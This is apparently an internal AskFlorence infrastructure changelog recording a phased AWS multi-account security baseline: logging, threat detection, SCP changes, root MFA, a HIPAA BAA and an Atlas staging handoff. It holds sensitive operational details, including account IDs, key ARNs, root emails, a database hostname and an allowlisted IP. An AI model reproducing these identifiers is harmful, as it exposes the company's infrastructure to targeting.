2026-04-18T01:00Z — Phase 2 complete: org-wide observability baseline ​

Actor: taha.abbasi via SSO AdministratorAccess (mgmt + each member as delegated admin)
Linked: Issue #47

What shipped ​

2a — Log-archive foundations (all in 754660694122):

  • KMS CMK alias/askflorence-org-logs (arn:aws:kms:us-east-1:754660694122:key/e9dfcdbe-19e1-491c-a8f9-d17612cf6353) with annual auto-rotation, policy allowing CloudTrail + Config service encrypt and org-wide decrypt.
  • S3 bucket askflorence-org-cloudtrail-logs-754660694122 — object-lock COMPLIANCE 7yr, versioning, SSE-KMS, public access blocked, deny-non-SSL, CloudTrail write + deny-unencrypted-puts.
  • S3 bucket askflorence-org-config-754660694122 — SSE-KMS, versioning, public access blocked, deny-non-SSL, org-wide Config write.

2b — Trusted access + delegations + org trail:

  • Enabled trusted access for 9 services (cloudtrail, config, config-multiaccountsetup, guardduty, securityhub, access-analyzer, stacksets, ram, ssm).
  • Delegated admin to log-archive (754660694122) for: guardduty, securityhub, config, config-multiaccountsetup, access-analyzer.
  • askflorence-org-trail in mgmt — multi-region, org-wide, global events on, log file validation, SSE-KMS, CloudWatch Logs export (365d), Insights (ApiCallRate + ApiErrorRate).

2c — GuardDuty + Security Hub + Config:

  • GuardDuty: org-wide auto-enroll ALL. Delegated admin detector 44396c0b61674ade87312ff13ab85996 in log-archive + self-managed detector 9a71698300b24e55a21a53c4d8f660a9 in mgmt. Features: S3 data events, EBS malware protection, Runtime monitoring (ECS Fargate).
  • Security Hub: delegated admin = log-archive. Finding aggregator ALL_REGIONS→us-east-1. Standards: FSBP + CIS 1.2 (default) everywhere; CIS v3.0.0 on prod + staging; NIST 800-53 Rev 5 on prod (HIPAA-aligned).
  • Config: recorder + delivery channel in all 4 accounts, customer-managed AskFlorenceConfigRole per account, snapshots to askflorence-org-config-754660694122. Org-wide aggregator askflorence-org-aggregator in log-archive.

2d — Drata autopilot role stubs:

  • DrataAutopilotRole created in all 4 accounts. Policies pre-attached (SecurityAudit + ReadOnlyAccess + DrataAutopilotExtras inline). Trust policy is a placeholder pointing to mgmt root with ExternalId PLACEHOLDER-REPLACE-ON-DRATA-ONBOARD. When Drata is activated (Phase 12 / later), swap trust policy to Drata's official autopilot account ARN + their issued ExternalId — no further policy work needed.

2e — Documentation landed:

  • NEW: cloudtrail-setup.md
  • NEW: guardduty-setup.md
  • NEW: security-hub-setup.md
  • NEW: config-setup.md

Verification ​

  • aws cloudtrail get-trail-status --name askflorence-org-trail → IsLogging true.
  • aws guardduty describe-organization-configuration --detector-id 44396c0b61674ade87312ff13ab85996 → AutoEnableOrganizationMembers = ALL.
  • aws securityhub describe-organization-configuration → AutoEnable true, AutoEnableStandards DEFAULT.
  • aws configservice describe-configuration-recorder-status (each account) → recording=true.
  • aws configservice describe-configuration-aggregators (log-archive) → askflorence-org-aggregator present.

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC7.1 (Infrastructure Management) + CC7.2 (Change Detection): CloudTrail org trail, Config recorders, GuardDuty on day one — this is the continuous-operating-evidence auditors look for.
  • HIPAA §164.308(a)(1)(ii)(D) (Information System Activity Review): CloudTrail + GuardDuty satisfy the audit-trail requirement for systems handling PHI (once PHI workloads land in Phase 5+).
  • CMS EDE Phase 3: auditors will ask for 6-12 months of audit trail and threat detection history. Clock starts now.
  • Drata readiness: read-only role stubs in all 4 accounts mean Drata onboarding later is a trust-policy swap, not a fresh IAM setup.

Pending follow-up ​

  • Expected: Security Hub controls will transition from PENDING to PASSED/FAILED over ~30-60 min. Review initial findings, document any expected failures (resources that don't exist yet pre-Phase 4).
  • Future (Phase 8): apply HIPAA conformance pack to prod Config from log-archive delegated admin.
  • Future (Phase 11): EventBridge rule to forward CRITICAL findings to alerting destination.

2026-04-18T00:45Z — Root MFA registered on all 3 new member accounts ​

Actor: taha.abbasi via root user of each member account
Linked: Issue #47

What shipped ​

Root user on each of the 3 new member accounts now has:

  • Password set via the AWS sign-in forgot-password flow (email delivered to aws@askflorence.health via plus-addressing).
  • Virtual MFA device registered (see iam:mfa/* ARN on each account's Security Credentials page).
  • Root session signed out after MFA setup.

| Account | Account ID | Root email | MFA |
| --- | --- | --- | --- |
| askflorence-prod | 039624954211 | aws+prod@askflorence.health | Virtual, registered 2026-04-18 |
| askflorence-staging | 549136075525 | aws+staging@askflorence.health | Virtual, registered 2026-04-18 |
| askflorence-log-archive | 754660694122 | aws+log-archive@askflorence.health | Virtual, registered 2026-04-18 |

SOC 2 / HIPAA / EDE relevance ​

  • SOC 2 CC6.1 (Logical Access) and CC6.2 (Credentials) — MFA required on privileged identities.
  • HIPAA §164.312(d) (Person or Entity Authentication) — multi-factor present on all root users.
  • Management-account root MFA already in place (pre-migration).
  • Zero root access keys on any of the 3 new accounts (confirmed during bootstrap — Organizations-created accounts don't get them by default).

Day-to-day path is SSO AdministratorAccess / PowerUserAccess — root is sealed.


2026-04-18T00:30Z — SCP ScpBaseline v2: carve out root-bootstrap actions ​

Actor: taha.abbasi via SSO AdministratorAccess in management account 778477254880
Linked: Issue #47

Why ​

Phase 1 v1 of ScpBaseline (p-oy7xxdzz) had a blanket DenyRootUser rule that denied all actions when principal matched arn:aws:iam::*:root. This blocked root from performing the one-time bootstrap actions AWS requires for new member accounts (setting up MFA, changing password, listing access keys). Evidence: Taha saw Access denied to iam:ListMFADevices on root of 039624954211 with SCP p-oy7xxdzz cited in the error.

What changed ​

Replaced DenyRootUser with DenyRootExceptBootstrap — uses NotAction + Deny so root can only perform an allow-list of bootstrap actions, and is denied everything else. Allow-list:

  • iam:CreateVirtualMFADevice, DeleteVirtualMFADevice, EnableMFADevice, DeactivateMFADevice, ResyncMFADevice, ListMFADevices, ListVirtualMFADevices, GetMFADevice
  • iam:ChangePassword, UpdateLoginProfile, GetLoginProfile
  • iam:GetAccountSummary, GetUser, ListAccessKeys, DeleteAccessKey, GetAccountPasswordPolicy, ListAccountAliases
  • sts:GetCallerIdentity, GetSessionToken
  • signin:*, aws-portal:*, account:*, health:*, support:*, supportplans:*, trustedadvisor:*

All other root actions remain denied. The rest of the SCP (region-lock, deny-leave-org, protect-CloudTrail/Config/GuardDuty/SecurityHub) is unchanged.
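
The NotAction + Deny shape can be sketched as follows, with the allow-list expanded to fully prefixed action names. The condition key (aws:PrincipalArn with StringLike) is an assumption based on the v1 description; the live policy text is not reproduced in this log. The small evaluator only models this one statement, not full SCP evaluation.

```python
from fnmatch import fnmatchcase

BOOTSTRAP_ACTIONS = [
    "iam:CreateVirtualMFADevice", "iam:DeleteVirtualMFADevice",
    "iam:EnableMFADevice", "iam:DeactivateMFADevice", "iam:ResyncMFADevice",
    "iam:ListMFADevices", "iam:ListVirtualMFADevices", "iam:GetMFADevice",
    "iam:ChangePassword", "iam:UpdateLoginProfile", "iam:GetLoginProfile",
    "iam:GetAccountSummary", "iam:GetUser", "iam:ListAccessKeys",
    "iam:DeleteAccessKey", "iam:GetAccountPasswordPolicy", "iam:ListAccountAliases",
    "sts:GetCallerIdentity", "sts:GetSessionToken",
    "signin:*", "aws-portal:*", "account:*", "health:*",
    "support:*", "supportplans:*", "trustedadvisor:*",
]

statement = {
    "Sid": "DenyRootExceptBootstrap",
    "Effect": "Deny",
    "NotAction": BOOTSTRAP_ACTIONS,  # everything NOT listed here is denied
    "Resource": "*",
    # Assumption: root is matched via the principal ARN pattern.
    "Condition": {"StringLike": {"aws:PrincipalArn": "arn:aws:iam::*:root"}},
}


def is_denied_for_root(action: str) -> bool:
    """True when this statement denies the action for a root principal."""
    lowered = action.lower()  # IAM action names match case-insensitively
    return not any(fnmatchcase(lowered, p.lower()) for p in statement["NotAction"])


print(is_denied_for_root("iam:ListMFADevices"))  # False
print(is_denied_for_root("ec2:RunInstances"))    # True
```

Because the statement is a Deny with NotAction, it grants nothing by itself; listed actions merely escape this deny and still need an allow elsewhere.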

Verification ​

  • aws organizations describe-policy --policy-id p-oy7xxdzz shows v2 content live.
  • Taha confirmed IAM Security Credentials page on 039624954211 now lists MFA devices after refresh.

Rollback ​

If a root action we didn't anticipate gets blocked, extend the allow-list (one PR) or temporarily detach the SCP (aws organizations detach-policy --policy-id p-oy7xxdzz --target-id <ou>) for the affected OU while debugging.

SOC 2 / HIPAA / EDE relevance ​

This tightens SOC 2 CC6.1 (Logical Access) — least-privilege enforcement on the highest-privilege identity (root). Aligns with AWS Well-Architected Security Pillar guidance "use root only for bootstrap tasks."


2026-04-18T00:25Z — AWS Organizations BAA accepted (org-wide) ​

Actor: taha.abbasi via root user of management account 778477254880, AWS Artifact → Organization agreements
Linked: Issue #47, Issue #57

What shipped ​

  • Accepted AWS Organizations Business Associate Addendum via AWS Artifact Organization agreements tab. Effective date: April 18, 2026. Status: Active.
  • BAA applies to: management account (778477254880) plus all current + future member accounts in organization o-vefew8kgv1. Covers askflorence-prod (039624954211), askflorence-staging (549136075525), and askflorence-log-archive (754660694122).
  • Signed PDF filed at: docs/infrastructure/evidence/aws-organizations-baa-signed-2026-04-18.pdf.
  • Coverage scope per BAA text: PHI is permitted to be processed only on HIPAA-eligible AWS services, encrypted in-transit and at-rest, under AWS Customer Agreement terms.

Compliance implications

  • SOC 2 CC1.4, HIPAA §164.314(a), CMS EDE Phase 3 — vendor-BAA evidence requirement for AWS satisfied at the infrastructure level.
  • Cross-links #57 (vendor BAA audit) — AWS row can be marked complete with reference to this evidence.
  • Remaining BAA work on #57 (owned by Asad): MongoDB Atlas, Resend, Cloudflare (DNS-only so not strictly required but good hygiene), PostHog, and future NIPR + ID-verification vendors.

2026-04-18T00:15Z — Mongo/Atlas parallel session handoff received

Actor: parallel Mongo/Atlas session agent
Linked: Issue #56, session brief at SESSION_BRIEF_2026-04-17_atlas.md

The Mongo session provisioned the staging Atlas cluster per the handoff instructions in the AWS migration plan. Both hard corrections applied (separate Atlas project, no mirrored allowlist).

Facts the AWS session will consume at Phase 4 and Phase 7

  • Atlas org ID: 69dc20c64005b222804daf75
  • Staging Atlas project: askflorence-staging → 69e31af12fd2c0aef51bbb41 (isolated from prod project 69dc20c64005b222804dafa4)
  • Staging cluster: askflorence-staging.efsikmv.mongodb.net — M0 free tier, us-east-1, MongoDB 8.0.21
  • Seed: snapshot from prod askflorence-prod-01, 35,056 docs, 231 MB (no PII/PHI)
  • Allowlist: 136.38.212.186/32 (Taha's laptop) only. No 0.0.0.0/0.
  • Users: 6 on staging (app_read_staging, app_writer_survey, app_writer_plans, app_writer_agents, app_admin_agents, audit_reader). Connection strings in .env.staging.local (gitignored, mode 600).
  • Prod Atlas project untouched: 69dc20c64005b222804dafa4. Narrow-scoped users roll out to prod in a later session post-cutover.

AWS follow-ups from this handoff

  • Phase 4: copy 6 staging Atlas URIs from .env.staging.local into AWS Secrets Manager under staging/mongodb/* in the staging account (549136075525).
  • Phase 7: create VPC peering from staging VPC (10.40.0.0/16) to Atlas staging project 69e31af12fd2c0aef51bbb41, then replace the laptop IP allowlist entry with the VPC CIDR.
  • Phase 8/11: same peering flow for the prod Atlas project 69dc20c64005b222804dafa4 ↔ AWS prod VPC (10.20.0.0/16).
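
Before peering, it can help to sanity-check the address ranges involved. The sketch below uses Python's standard `ipaddress` module with the CIDRs quoted in this entry to confirm the two VPC ranges do not overlap and to model the Phase 7 allowlist swap. It does not call the Atlas API; the function name `allowlist_after_peering` is hypothetical.

```python
import ipaddress

# Values quoted in this handoff entry.
STAGING_VPC = ipaddress.ip_network("10.40.0.0/16")
PROD_VPC = ipaddress.ip_network("10.20.0.0/16")
LAPTOP_ENTRY = ipaddress.ip_network("136.38.212.186/32")


def allowlist_after_peering(current, vpc):
    """Swap the laptop entry for the VPC CIDR, refusing any open-to-world range."""
    updated = [net for net in current if net != LAPTOP_ENTRY] + [vpc]
    if any(net.prefixlen == 0 for net in updated):
        raise ValueError("allowlist must not contain 0.0.0.0/0")
    return updated


if __name__ == "__main__":
    # Peered VPCs should use distinct ranges so routes stay unambiguous.
    print("VPC ranges overlap:", STAGING_VPC.overlaps(PROD_VPC))
    print(allowlist_after_peering([LAPTOP_ENTRY], STAGING_VPC))
```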

2026-04-18T00:00Z — Phase 1 complete: AWS Organizations + accounts + SSO + SCPs + budgets

Actor: taha.abbasi via SSO AdministratorAccess in account 778477254880
Linked: Issue #47, migration plan at ~/.claude/plans/hey-so-okay-that-delightful-eich.md
Session: AWS migration agent (parallel to Mongo/Atlas session on #56)

Changes

  1. OUs created under root r-9qla:

    • Prod — ou-9qla-8z7htmau
    • Non-Prod — ou-9qla-o6snxwss
    • Security — ou-9qla-c5psmqcy
  2. Member accounts created (Organizations async):

    • askflorence-prod — 039624954211 — aws+prod@askflorence.health → Prod OU
    • askflorence-staging — 549136075525 — aws+staging@askflorence.health → Non-Prod OU
    • askflorence-log-archive — 754660694122 — aws+log-archive@askflorence.health → Security OU
  3. IAM Identity Center permission sets created:

    • PowerUserAccess (PT4H) → managed policy PowerUserAccess
    • BillingReadOnly (PT4H) → managed policy job-function/Billing
    • SecurityAudit (PT4H) → managed policies SecurityAudit + ReadOnlyAccess
    • (existing) AdministratorAccess (PT1H) untouched
  4. SSO assignments: Taha assigned AdministratorAccess + PowerUserAccess on each of the 3 new accounts.

  5. SCP ScpBaseline created (p-oy7xxdzz) and attached to Prod, Non-Prod, Security OUs:

    • Deny root user actions on member accounts.
    • Deny organizations:LeaveOrganization.
    • Deny disabling CloudTrail / Config / GuardDuty / Security Hub.
    • Region lock to us-east-1 (global services and service-linked roles exempted).
  6. Budgets (all on management account 778477254880, filtered by LinkedAccount):

    • askflorence-prod-monthly: $200/mo
    • askflorence-staging-monthly: $100/mo
    • askflorence-log-archive-monthly: $50/mo
    • askflorence-org-total-monthly: $500/mo
    • All with 80% actual + 100% forecast alerts to taha@askflorence.health.
  7. ~/.aws/config on Taha's dev machine updated with profiles for each new account (AdminAccess + PowerUser on prod/staging, AdminAccess only on log-archive).
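
The alert levels in item 6 translate into dollar amounts as in the small sketch below. Budget names and limits are taken from the list above; the function name `alert_thresholds` is illustrative only, and nothing here calls the AWS Budgets API.

```python
# Monthly limits in USD, as listed in item 6.
BUDGETS_USD = {
    "askflorence-prod-monthly": 200,
    "askflorence-staging-monthly": 100,
    "askflorence-log-archive-monthly": 50,
    "askflorence-org-total-monthly": 500,
}
ACTUAL_ALERT_PCT = 80     # alert when actual spend reaches 80% of the limit
FORECAST_ALERT_PCT = 100  # alert when forecast spend reaches 100% of the limit


def alert_thresholds(budgets=BUDGETS_USD):
    """Return the dollar amount at which each alert would fire."""
    return {
        name: {
            "actual_usd": limit * ACTUAL_ALERT_PCT / 100,
            "forecast_usd": limit * FORECAST_ALERT_PCT / 100,
        }
        for name, limit in budgets.items()
    }


if __name__ == "__main__":
    for name, levels in alert_thresholds().items():
        print(name, levels)
```

For example, the prod budget's actual-spend alert corresponds to $160 of the $200 limit, and the org-total alert to $400 of $500.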

Verification

  • aws --profile askflorence-prod sts get-caller-identity returns a valid AWSReservedSSO_AdministratorAccess_* assumed-role in 039624954211 ✓
  • Same for askflorence-staging (549136075525) and askflorence-log-archive (754660694122) ✓
  • aws organizations list-accounts-for-parent shows each account in its correct OU ✓
  • aws organizations list-policies-for-target shows ScpBaseline attached to all 3 workload OUs ✓
  • aws budgets describe-budgets shows 5 budgets (4 new + 1 legacy) ✓
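
The first two checks can be scripted along these lines. This is a minimal sketch that parses the JSON printed by aws sts get-caller-identity and confirms the account ID and the AWSReservedSSO_AdministratorAccess_ role prefix; the function name `identity_ok` is hypothetical, and the role suffix and session name in the sample are made up.

```python
import json

# Profile name -> expected account ID, from this entry.
EXPECTED_ACCOUNTS = {
    "askflorence-prod": "039624954211",
    "askflorence-staging": "549136075525",
    "askflorence-log-archive": "754660694122",
}
ROLE_PREFIX = "AWSReservedSSO_AdministratorAccess_"


def identity_ok(profile, cli_json):
    """Check get-caller-identity output against the expected account and role."""
    ident = json.loads(cli_json)
    expected = EXPECTED_ACCOUNTS[profile]
    # Expected shape: arn:aws:sts::<account>:assumed-role/<role-name>/<session>
    parts = ident.get("Arn", "").split(":", 5)
    if len(parts) != 6 or parts[2] != "sts":
        return False
    resource = parts[5].split("/")
    return (
        ident.get("Account") == expected
        and parts[4] == expected
        and len(resource) == 3
        and resource[0] == "assumed-role"
        and resource[1].startswith(ROLE_PREFIX)
    )


if __name__ == "__main__":
    # Made-up sample; real output comes from:
    #   aws --profile askflorence-prod sts get-caller-identity
    sample = json.dumps({
        "UserId": "AROAEXAMPLE:example-session",
        "Account": "039624954211",
        "Arn": "arn:aws:sts::039624954211:assumed-role/"
               "AWSReservedSSO_AdministratorAccess_0123456789abcdef/example-session",
    })
    print(identity_ok("askflorence-prod", sample))
```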

Rollback

All Phase 1 changes are reversible, but closing a member account leaves it in the SUSPENDED state for 90 days on AWS's side before the closure becomes permanent. There is no reason to roll back: all changes are additive and do not affect the live Vercel site.

Pending follow-up

  • AWS BAA signing in Artifact console (manual, must be done in-browser by Taha).
  • Root credentials + MFA setup on all 3 member accounts (one-time, Taha only).
  • Seal root credentials in password vault + hardware MFA in physical safe.


AskFlorence Internal Documentation. Not for public distribution.
